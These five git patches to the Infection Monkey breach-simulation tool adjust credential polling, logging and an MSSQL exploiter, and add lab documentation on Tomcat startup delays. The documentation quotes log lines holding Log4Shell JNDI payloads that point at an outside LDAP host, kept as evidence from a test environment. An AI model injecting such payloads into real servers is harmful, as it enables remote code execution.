From 0fce4e88a552743c4c39cfd867b7cf26c763158f Mon Sep 17 00:00:00 2001
From: Mike Salvatore <mike.s.salvatore@gmail.com>
Date: Mon, 2 May 2022 15:25:32 -0400
Subject: [PATCH 1/5] Agent: Drop CREDENTIALS_POLL_PERIOD_SEC from 30 to 10

---
 .../credential_store/aggregating_credentials_store.py           | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/monkey/infection_monkey/credential_store/aggregating_credentials_store.py b/monkey/infection_monkey/credential_store/aggregating_credentials_store.py
index 27ead7d26..47f097dad 100644
--- a/monkey/infection_monkey/credential_store/aggregating_credentials_store.py
+++ b/monkey/infection_monkey/credential_store/aggregating_credentials_store.py
@@ -11,7 +11,7 @@ from .i_credentials_store import ICredentialsStore
 
 logger = logging.getLogger(__name__)
 
-CREDENTIALS_POLL_PERIOD_SEC = 30
+CREDENTIALS_POLL_PERIOD_SEC = 10
 
 
 class AggregatingCredentialsStore(ICredentialsStore):

From 2d685ef44a60ba86f510ebcbb634499245dd8ef2 Mon Sep 17 00:00:00 2001
From: Mike Salvatore <mike.s.salvatore@gmail.com>
Date: Mon, 2 May 2022 15:42:36 -0400
Subject: [PATCH 2/5] Agent: Log agent's GUID

---
 monkey/infection_monkey/monkey.py | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/monkey/infection_monkey/monkey.py b/monkey/infection_monkey/monkey.py
index 8d01b3b9d..e31c62cad 100644
--- a/monkey/infection_monkey/monkey.py
+++ b/monkey/infection_monkey/monkey.py
@@ -116,7 +116,8 @@ class InfectionMonkey:
             logger.info("Another instance of the monkey is already running")
             return
 
-        logger.info("Monkey is starting...")
+        logger.info("Agent is starting...")
+        logger.info(f"Agent GUID: {GUID}")
 
         self._add_default_server_to_config(self._opts.server)
         self._connect_to_island()

From 17db25b00bb4ea358672c34222d7c29a47381a3a Mon Sep 17 00:00:00 2001
From: Mike Salvatore <mike.s.salvatore@gmail.com>
Date: Tue, 3 May 2022 08:22:53 -0400
Subject: [PATCH 3/5] Agent: Log MSSQL error when authentication fails

---
 monkey/infection_monkey/exploit/mssqlexec.py | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py
index f6b44471a..c765c2de5 100644
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@@ -242,7 +242,8 @@ class MSSQLExploiter(HostExploiter):
                 self.report_login_attempt(True, user, password)
                 cursor = conn.cursor()
                 return cursor
-            except pymssql.OperationalError:
+            except pymssql.OperationalError as err:
+                logger.info(f"Connection to MSSQL failed: {err}")
                 self.report_login_attempt(False, user, password)
                 # Combo didn't work, hopping to the next one
                 pass

From 2f3c08cb77ecf01160b46fb52703ab8ddf0df1fe Mon Sep 17 00:00:00 2001
From: Mike Salvatore <mike.s.salvatore@gmail.com>
Date: Tue, 3 May 2022 13:46:31 -0400
Subject: [PATCH 4/5] BB: Add a note about setting java.security.egd for tomcat

---
 envs/monkey_zoo/docs/fullDocs.md | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/envs/monkey_zoo/docs/fullDocs.md b/envs/monkey_zoo/docs/fullDocs.md
index 617106c4d..77ed166b9 100644
--- a/envs/monkey_zoo/docs/fullDocs.md
+++ b/envs/monkey_zoo/docs/fullDocs.md
@@ -915,7 +915,11 @@ Accessiable only through <strong>3-45 Powershell</strong> using credentials reus
 </tr>
 <tr class="even">
 <td>Notes:</td>
-<td></td>
+<td>The jvm's `java.security.egd` variable should be set to `/dev/urandom`,
+otherwise the tomcat service can take a very long time to start. Set this by
+editing `/usr/tomcat/bin/catalina.sh` and modifying the `JAVA_OPTS` vairable.
+See https://jfrog.com/knowledge-base/tomcat-takes-forever-to-start-what-can-i-do/
+for more details.</td>
 </tr>
 </tbody>
 </table>

From 61793d56cf4661b680f5926bf3942aa01ea53635 Mon Sep 17 00:00:00 2001
From: Mike Salvatore <mike.s.salvatore@gmail.com>
Date: Wed, 4 May 2022 10:30:55 -0400
Subject: [PATCH 5/5] BB: Add a note about clearing tomcat sessions

---
 envs/monkey_zoo/docs/fullDocs.md | 31 ++++++++++++++++++++++++++++++-
 1 file changed, 30 insertions(+), 1 deletion(-)

diff --git a/envs/monkey_zoo/docs/fullDocs.md b/envs/monkey_zoo/docs/fullDocs.md
index 77ed166b9..077ccfc59 100644
--- a/envs/monkey_zoo/docs/fullDocs.md
+++ b/envs/monkey_zoo/docs/fullDocs.md
@@ -919,7 +919,36 @@ Accessiable only through <strong>3-45 Powershell</strong> using credentials reus
 otherwise the tomcat service can take a very long time to start. Set this by
 editing `/usr/tomcat/bin/catalina.sh` and modifying the `JAVA_OPTS` vairable.
 See https://jfrog.com/knowledge-base/tomcat-takes-forever-to-start-what-can-i-do/
-for more details.</td>
+for more details.
+
+Tomcat sessions that carry over through a reset can cause significant delays
+when the tomcat server starts. When the server starts, it attempts to download
+the log4shell payload, but the server is no longer listening. This operation
+appears to have a 2 minute timeout. You can see it by viewing
+`/usr/tomcat/logs/localhost.log`:
+
+```
+2022-04-28 16:15:45,541 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- Sending application start events
+2022-04-28 16:15:45,542 [localhost-startStop-1] INFO  org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- ContextListener: contextInitialized()
+2022-04-28 16:15:45,542 [localhost-startStop-1] INFO  org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- SessionListener: contextInitialized()
+2022-04-28 16:15:45,665 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- readObject() loading session E5B004FF35E1CBB44FA8A69AB024941D
+2022-04-28 16:15:45,665 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]-   loading attribute 'foo' with value '${jndi:ldap://10.2.2.121:29573/dn=Exploit}'
+2022-04-28 16:17:56,412 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- readObject() loading session 0677AD75F804B1FD4E24AF7F3BFA9DD9
+2022-04-28 16:17:56,412 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]-   loading attribute 'foo' with value '${jndi:ldap://10.2.2.121:39466/dn=Exploit}'
+2022-04-28 16:20:07,472 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- Starting filters
+2022-04-28 16:20:07,472 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]-  Starting filter 'Set Character Encoding'
+2022-04-28 16:20:07,477 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]-  Starting filter 'Compression Filter'
+```
+
+Notice the 2-minute gap between the timestamps after "loading attribute 'foo'".
+
+To resolve this, modify /usr/tomcat/conf/context.xml and uncomment the following
+setting:
+
+```
+<Manager pathname="" />
+```
+</td>
 </tr>
 </tbody>
 </table>